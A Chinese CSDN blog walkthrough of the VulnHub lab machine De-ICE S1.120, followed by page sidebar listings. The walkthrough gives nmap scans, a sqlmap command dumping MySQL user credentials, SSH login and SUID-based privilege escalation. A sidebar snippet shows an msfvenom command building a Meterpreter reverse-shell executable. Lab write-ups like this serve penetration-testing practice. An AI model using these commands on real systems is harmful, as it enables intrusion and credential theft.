De-ICE_S1.120靶机

于 2024-07-29 21:38:25 发布
阅读量135 收藏 5
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zdd1453691081/article/details/140781826
版权

信息收集:

靶机地址:https://www.vulnhub.com/entry/de-ice-s1120,10/

(1)配置ip

给kali设置一个仅主机模式,跟靶机的ip在同一个网段

(2)扫描ip

nmap 192.168.1.0/24 -sn | grep -B 2 '00:0C:29:AB:64:6F'

(3)端口扫描

nmap 192.168.1.120 -p- -A

getshell:

(1)访问页面,点击“添加产品”

(2)点击输入并提交

(3)点击“查看产品”选项,出现如下界面,选择产品1然后再点击提交按钮,发现http://192.168.1.120/products.php?id=1

(4)sqlmap

http://192.168.1.120/products.php?id=1

(5)跑出账号密码

python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" -D mysql -T user --dump  --batch

(6)使用ccoffee用户进行ssh远程连接

ssh ccoffee@192.168.1.120

提权:

(1)运行以下命令来枚举具有 SUID 权限的所有二进制文件

find / -perm -u=s -type f 2>/dev/null

(2)从截图中可以看出,在列出的所有用户中,用户 ccoffee 为位于路径 /home/ccoffee/scripts/getlogs.sh 命令启用了 SUID 位,这意味着我们可以执行 getlogs.sh 命令内的任何命令

(3)切换到/home/ccoffee/scripts/目录下

cd /home/ccoffee/scripts/

(4)将 getlogs.sh 移动到 getlogs.sh.bak,然后使用以下代码创建一个新的 getlogs.sh 文件以生成 shell

(5)使用 sudo执行getlogs.sh文件

(6)提权成功

阿卡丽的神秘铺子
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。... ... ...访问控制是 Windows 操作系统安全的重要组成部分。访问控制列表(Access Control List,ACL)是 NTFS 文件系统的重要组成...
Kioptrix2-WalkThrough 靶机复现.docx
10-18
1. 信息收集:使用 nmap 工具对靶机进行 IP 探活和端口扫描。 2. SQL 注入:使用万能密码尝试登录到靶机上。 3. 命令执行:使用;pwd 命令来确定当前目录,并执行系统命令。 4. 反弹 shell:使用 nc 命令将 shell ...
CFS.zip_CFS-GA_cfs
09-21
1. **混沌序列生成**:CFS的核心是使用混沌系统生成伪随机序列,这些序列用于混淆数据。混沌系统的特性使其产生的序列具有高度的不可预测性,增强了加密的安全性。 2. **数据分块**:原始文件被分割成多个小的数据...
Metasploitable_ubuntu-book.zip
07-14
《Metasploit渗透测试魔鬼训练营》中的"Metasploitable_ubuntu-book.zip"是一个针对安全研究人员和IT专业人员的教育资源,它提供了一个Linux靶机环境,特别适合学习和测试安全漏洞。靶机,简单来说,就是一种模拟...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
chromedriver-mac-arm64_126.0.6465.0.zip
07-31
chromedriver-mac-arm64_126.0.6465.0.zip
chromedriver-mac-x64_122.0.6235.0.zip
最新发布
07-31
chromedriver-mac-x64_122.0.6235.0.zip
chromedriver-mac-x64_122.0.6188.0.zip
07-31
chromedriver-mac-x64_122.0.6188.0.zip
【JCR2区】基于matlab阿基米德算法优化最小二乘法AOA-LSSVM数据分类【含Matlab源码 6004期】.zip
07-31
CSDN海神之光上传的代码均可运行,亲测可用,换数据就行,适合小白; 1、代码压缩包内容 主函数:main.m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化最小二乘法支持向量机LSSVM分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化LSSVM 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化LSSVM 4.4.3 灰狼算法GWO/狼群算法WPA优化LSSVM 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化LSSVM 4.4.5 萤火虫算法FA/差分算法DE优化LSSVM 4.4.6 其他优化算法优化LSSVM
【JCR2区】基于matlab蚁狮算法优化最小二乘法ALO-LSSVM数据分类【含Matlab源码 6057期】.zip
07-31
CSDN海神之光上传的代码均可运行,亲测可用,换数据就行,适合小白; 1、代码压缩包内容 主函数:main.m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化最小二乘法支持向量机LSSVM分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化LSSVM 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化LSSVM 4.4.3 灰狼算法GWO/狼群算法WPA优化LSSVM 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化LSSVM 4.4.5 萤火虫算法FA/差分算法DE优化LSSVM 4.4.6 其他优化算法优化LSSVM
chromedriver-mac-x64_120.0.6084.0.zip
07-31
chromedriver-mac-x64_120.0.6084.0.zip
chromedriver-mac-x64_122.0.6226.2.zip
07-31
chromedriver-mac-x64_122.0.6226.2.zip
chromedriver-mac-x64_121.0.6103.0.zip
07-31
chromedriver-mac-x64_121.0.6103.0.zip
chromedriver-mac-x64_122.0.6208.0.zip
07-31
chromedriver-mac-x64_122.0.6208.0.zip
chromedriver-mac-arm64_127.0.6487.0.zip
07-31
chromedriver-mac-arm64_127.0.6487.0.zip
chromedriver-mac-arm64_128.0.6609.0.zip
07-31
chromedriver-mac-arm64_128.0.6609.0.zip
Python100-master (20).zip
07-31
python
apache-activemq-5.10到apache-activemq6.1大版本合集
07-31
activemq-parent-5.10.0-source-release.zip activemq-parent-5.10.2-source-release.zip activemq-parent-5.12.3-source-release.zip apache-activemq-5.10.2-bin.tar.gz apache-activemq-5.11.4-bin.zip apache-activemq-5.12.3-bin.zip apache-activemq-5.13.5-bin.zip apache-activemq-5.14.5-bin.zip apache-activemq-5.15.9-bin.zip apache-activemq-5.16.7-bin.zip apache-activemq-5.17.6-bin.zip apache-activemq-5.18.5-bin.zip apache-activemq-5.9.1-bin.zip apache-activemq-6.0.1-bin.zip apache-activemq-6.1.2-bin.zip
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe这个IP是靶机IP还是虚拟机ip
05-27
这个 IP 是指你的攻击机器 (Kali Linux) 上用于监听的 IP 地址。 假设你的攻击机器 IP 地址为 192.168.1.100,你想要在靶机上运行一个反向 TCP Meterpreter,那么你可以使用以下命令生成 Payload 文件: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe ``` 其中,LHOST 参数指定了反向连接时的目标 IP 地址,即指定 Meterpreter 连接的攻击机器 IP 地址。LPORT 参数指定了监听的端口号,这个端口号需要和后面启动 Meterpreter listener 时使用的端口号一致。 在生成 Payload 文件后,你需要将它传输到靶机上,并在靶机上运行它。当 Payload 文件在靶机上被执行时,它会尝试连接到你指定的攻击机器 IP 地址和端口号,从而建立反向连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值